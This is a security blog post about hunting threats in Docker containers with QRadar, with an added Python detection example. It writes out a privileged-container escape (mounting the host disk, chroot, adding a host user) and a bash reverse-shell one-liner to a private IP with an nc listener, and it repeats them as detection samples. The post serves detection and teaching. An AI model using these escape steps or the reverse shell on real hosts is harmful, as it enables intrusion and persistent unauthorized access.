IBM Security QRadar


Threat Hunting in Containers

By MUTAZ ALSALLAL posted Wed October 02, 2019 12:48 PM

  

Containers are an operating system virtualisation technology used to package applications together with their dependencies so that they can run anywhere ("write once, run anywhere").

With more and more production containers and services being deployed into cloud environments, the threat landscape has evolved. Security analysts need to be aware of the different threats targeting the container landscape, especially at runtime, and of how an adversary can break out of or escape the container to control the host operating system.

 

Container Runtime Security


One of the main techniques to detect whether a container has been compromised is to monitor the container's behaviour at runtime. Scanning the container image is not enough; we also need to keep an eye on its behaviour while it runs.

Containers share the host kernel, which makes it much easier to monitor container behaviour: we can see every process execution, network connection and file modification from all the containers at the host level, without installing any agent inside the containers.

Using QRadar, we can baseline the container behaviour and notify the security analysts when a container deviates from its intended behaviour, for example:

If a container starts executing unknown, unseen or unusual processes

If a container communicates with unusual IPs / network CIDRs / countries, …

Or if a container modifies critical files in the host operating system

 


Process Creation in a container

 

Escaping the Container


One of the main goals of adversaries is to escape the container and escalate their privileges to control the host operating system. There are several ways to achieve this; one of them applies when the compromised container is a privileged container.

Security analysts need to keep an eye on privileged containers, as they can access the host devices: if the compromised container is a privileged one, an adversary can mount the host hard disk and edit any file in the host operating system.

As an example, let us create the following privileged container and see how we can add a new user to the host operating system, and then SSH to the host OS using the newly added user.

 

## to create a privileged container:

docker run --privileged -it ubuntu bash

 

Detecting the creation of a Privileged Container

As the privileged container can access the host devices, let us mount the host hard disk:

mkdir /mutaz

fdisk -l

mount /dev/sda1 /mutaz

 

Now let us add a new privileged user to the host OS. We can do it by directly modifying /etc/passwd under our mounted path, or by changing the process root directory to our mounted path:

 

chroot /mutaz /bin/bash

adduser mike

 

Container added a new user in the host OS

 

We have just added a new user to the host operating system while inside the container. There are many ways to make this user a privileged one, e.g. by adding the user to a privileged group, or, more simply, by changing the user's uid to zero, which can be detected by looking for a non-root user with a uid of zero. Security analysts also need to watch for an unusual process modifying a critical file like /etc/passwd; sysadmins and DevOps engineers will not directly modify such a file.

 

Reverse Shell for Persistence


One way to achieve persistence is to plant a reverse shell, which an adversary can do in a single command line as follows:

 

bash -i >& /dev/tcp/192.168.0.171/4444 0>&1

 

The attacker listens for the incoming connection on port 4444 as follows:

nc -lvp 4444

 

Detection of Reverse Shell
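To illustrate the hunts described above at the host level (baselining container processes, creation of a privileged container, chroot from inside a container, a non-root account with uid 0, and the /dev/tcp reverse shell), here is an added Python example; it is not part of the original post or of the QRadar content pack, and the event format, the baseline and the sample lines are constructed assumptions.

```python
import re

# Constructed sample process events (not real QRadar data), one per execution seen
# at the host level, in the form "<container> <user> <command>".
SAMPLE_EVENTS = [
    "web-1 www-data nginx -g 'daemon off;'",
    "web-1 root bash -i >& /dev/tcp/192.168.0.171/4444 0>&1",
    "ci-2 root docker run --privileged -it ubuntu bash",
    "web-1 root chroot /mutaz /bin/bash",
]
# Constructed /etc/passwd content in which 'mike' has been given uid 0.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nmike:x:0:1001::/home/mike:/bin/bash\n"
# Assumed baseline of the processes each container normally runs.
BASELINE = {"web-1": {"nginx"}, "ci-2": {"docker", "git"}}

REVERSE_SHELL = re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d+")
PRIVILEGED_RUN = re.compile(r"\bdocker\s+run\b.*--privileged\b")


def find_uid_zero_non_root(passwd_text):
    """Return user names other than 'root' whose uid field (3rd column) is 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def classify_event(line):
    """Return the detection names that one process event line triggers."""
    container, _user, command = line.split(" ", 2)
    findings = []
    if command.split()[0] not in BASELINE.get(container, set()):
        findings.append("unbaselined_process")
    if REVERSE_SHELL.search(command):
        findings.append("reverse_shell")
    if PRIVILEGED_RUN.search(command):
        findings.append("privileged_container")
    if command.startswith("chroot "):
        findings.append("chroot_from_container")
    return findings


def hunt(events, passwd_text):
    """Map each suspicious event (or uid-0 account) to the findings it raised."""
    alerts = {line: classify_event(line) for line in events}
    alerts = {k: v for k, v in alerts.items() if v}
    for name in find_uid_zero_non_root(passwd_text):
        alerts["passwd:" + name] = ["uid_zero_non_root"]
    return alerts
```

Each of these checks maps to one of the rules a QRadar analyst would build over host-level process and file events; the baseline lookup is what turns "unknown process" into an alert rather than noise.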

 

Security analysts can hunt all of the above malicious activities, and more, using the following out-of-the-box QRadar content pack:

https://exchange.xforce.ibmcloud.com/hub/extension/03b5e623d978dfa84b339dd6d38e02d5

 




#QRadar